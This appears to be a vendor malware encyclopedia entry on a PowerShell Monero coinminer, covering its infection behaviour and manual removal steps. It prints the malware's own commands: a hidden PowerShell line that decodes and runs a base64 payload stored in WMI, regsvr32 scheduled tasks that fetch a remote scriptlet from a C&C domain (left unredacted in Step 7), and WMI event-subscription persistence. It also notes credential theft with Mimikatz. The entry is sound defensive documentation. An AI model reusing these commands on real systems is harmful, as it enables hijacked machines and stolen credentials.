Analysis by: Jemimah Mae Molina
ALIASES:

Troj/PSCmine-A (SOPHOS_LITE)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Coinminer

  • Destructiveness: No

  • Encrypted: Yes

  • In the wild: Yes

  OVERVIEW

Infection Channel: Downloaded from the Internet, Dropped by other malware

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size: 4,092,382 bytes
File Type: PS1
Memory Resident: Yes
Initial Samples Received Date: 08 Mar 2019
Payload: Connects to URLs/IPs, Steals information, Terminates processes, Adds scheduled tasks

Arrival Details

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Coinminer drops and executes the following files:

It adds the following processes:

  • NETSTAT.EXE -anop tcp
  • powershell.exe -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)))Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

Other System Modifications

This Coinminer adds the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\IPSec
OperationMode = 3

Download Routine

This Coinminer accesses the following websites to download files:

  • http://update.{BLOCKED}k.com:443/ver.txt
  • http://update.{BLOCKED}k.com:443/antitrojan.ps1
  • http://update.{BLOCKED}k.com:443/logos.png
  • http://update.{BLOCKED}k.com:443/cohernece.txt
  • http://update.{BLOCKED}k.com:443/antivirus.php
  • http://{BLOCKED}.{BLOCKED}.217.139/vercheck.ps1

Other Details

This Coinminer does the following:

  • It automatically updates itself.
  • It terminates processes with established connection to ports 3333, 5555, 7777.
  • It terminates powershell processes with established connection to ports 80, 14444, 14433.
  • It gets user's credentials using Mimikatz, then saves it to %User Temp%\a25hY2tlcmVk.txt.
  • It propagates across networks via SMB.

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, and 8.)

It adds the following scheduled tasks:

  • Task Name: WindowsLogTasks
    Schedule: At system startup
    Task to be run: regsvr32 /u /s /i:http://update.{BLOCKED}k.com:443/antivirus.php scrobj.dll
  • Task Name: System Log Security Check
    Schedule: After triggered, repeat every 20 minutes indefinitely
    Task to be run: regsvr32 /u /s /i:http://update.{BLOCKED}k.com:443/antivirus.php scrobj.dll

NOTES:
If affected machine is 64-bit, it downloads and executes the following in the accessed C&C:

  • http://update.{BLOCKED}k.com:443/antivirus.ps1
It executes the following commands to add an IPSEC policy named netbc to block incoming traffic on the SMB server which uses TCP port 445:
  • netsh.exe ipsec static add policy name=netbc
  • netsh.exe ipsec static add filterlist name=block
  • netsh.exe ipsec static add filteraction name=block action=block
  • netsh.exe ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
  • netsh.exe ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
  • netsh.exe ipsec static set policy name=netbc assign=y
It creates the following WMI Class under ROOT\default:
  • System_Anti_Virus_Core - it serves as a repository for its encoded components (mimikatz, monero, etc.)
It creates the following WMI Classes under ROOT\subscription to achieve persistence in the system:
  • CommandLineEventConsumer
    • Name: Windows Events Consumer
    • CommandLineTemplate: powershell.exe -NoP -NonI -W Hidden -E {base64 encoded command}
  • __EventFilter
    • Name: Windows Events Filter
  • __FilterToConsumerBinding
It deletes the following scheduled task:
  • yastcat
It terminates processes whose process name contains the following string:
  • cryptonight
It modifies power configuration settings using the following commands:
  • powercfg.exe /CHANGE -standby-timeout-ac 0 (Standby timeout to 0 minutes)
  • powercfg.exe /CHANGE -hibernate-timeout-ac 0 (Hibernate timeout to 0 minutes)
  • powercfg.exe -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 (Set lid close action/pushing power button to do nothing)

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 14.859.00
FIRST VSAPI PATTERN DATE: 08 Mar 2019
VSAPI OPR PATTERN File: 14.859.00
VSAPI OPR PATTERN Date: 08 Mar 2019

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Remove malware/grayware files dropped/downloaded by Coinminer.PS1.MALXMR.AE. (Note: Please skip this step if the threats listed below have already been removed.)

Step 4

Restart in Safe Mode

[ Learn More ]

Step 5

Restore this modified registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPSec
    • From: OperationMode = 3
      To: OperationMode = <default value>

Step 6

Search and delete this file

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %User Temp%\a25hY2tlcmVk.txt

Step 7

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

  • WindowsLogTasks - regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
  • System Log Security Check - regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll

For Windows 2000, Windows XP, and Windows Server 2003:

  1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
    System Tools>Scheduled Tasks.
  2. Locate each {Task Name} values listed above in the Name column.
  3. Right-click on the said file(s) with the aforementioned value.
  4. Click on Properties. In the Run field, check for the listed {Task to be run}.
  5. If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

  1. Open the Windows Task Scheduler. To do this:
    • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
    • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
  2. In the left panel, click Task Scheduler Library.
  3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
  4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
  5. If the said string is found, delete the task.

Step 8

Restart in normal mode and scan your computer with your Trend Micro product for files detected as Coinminer.PS1.MALXMR.AE. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

NOTES:

Restore power configuration in Control Panel according to user preference.
Execute the following in command prompt to remove the created WMI instances:

  • powershell.exe Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter Name= 'Windows Events Filter' | remove-WMIObject
  • powershell.exe Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter Name='Windows Events Consumer' | remove-WMIObject
  • powershell.exe Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter __Path LIKE '%Windows Events Consumer%' | remove-WMIObject
  • powershell.exe ([WmiClass]'root\default:System_Anti_Virus_Core') | Remove-WMIObject


Did this description help? Tell us how we did.